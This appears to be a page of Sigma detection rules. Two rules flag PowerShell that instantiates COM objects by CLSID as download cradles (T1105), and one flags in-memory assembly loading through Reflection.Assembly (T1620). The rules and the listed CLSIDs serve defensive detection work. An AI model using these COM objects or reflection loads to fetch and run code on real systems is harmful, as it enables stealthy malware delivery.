Techniques
Sample rules
Potential COM Objects Download Cradles Usage - Process Creation
- source: sigma
- technicques:
- t1105
Description
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
Detection logic
condition: all of selection_*
selection_1:
CommandLine|contains: '[Type]::GetTypeFromCLSID('
selection_2:
CommandLine|contains:
- 0002DF01-0000-0000-C000-000000000046
- F6D90F16-9C73-11D3-B32E-00C04F990BB4
- F5078F35-C551-11D3-89B9-0000F81FE221
- 88d96a0a-f192-11d4-a65f-0040963251e5
- AFBA6B42-5692-48EA-8141-DC517DCF0EF1
- AFB40FFD-B609-40A3-9828-F88BBE11E4E3
- 88d96a0b-f192-11d4-a65f-0040963251e5
- 2087c2f4-2cef-4953-a8ab-66779b670495
- 000209FF-0000-0000-C000-000000000046
- 00024500-0000-0000-C000-000000000046
Potential COM Objects Download Cradles Usage - PS Script
- source: sigma
- technicques:
- t1105
Description
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
Detection logic
condition: all of selection_*
selection_1:
ScriptBlockText|contains: '[Type]::GetTypeFromCLSID('
selection_2:
ScriptBlockText|contains:
- 0002DF01-0000-0000-C000-000000000046
- F6D90F16-9C73-11D3-B32E-00C04F990BB4
- F5078F35-C551-11D3-89B9-0000F81FE221
- 88d96a0a-f192-11d4-a65f-0040963251e5
- AFBA6B42-5692-48EA-8141-DC517DCF0EF1
- AFB40FFD-B609-40A3-9828-F88BBE11E4E3
- 88d96a0b-f192-11d4-a65f-0040963251e5
- 2087c2f4-2cef-4953-a8ab-66779b670495
- 000209FF-0000-0000-C000-000000000046
- 00024500-0000-0000-C000-000000000046
Potential In-Memory Execution Using Reflection.Assembly
- source: sigma
- technicques:
- t1620
Description
Detects usage of “Reflection.Assembly” load functions to dynamically load assemblies in memory
Detection logic
condition: selection
selection:
ScriptBlockText|contains: '[Reflection.Assembly]::load'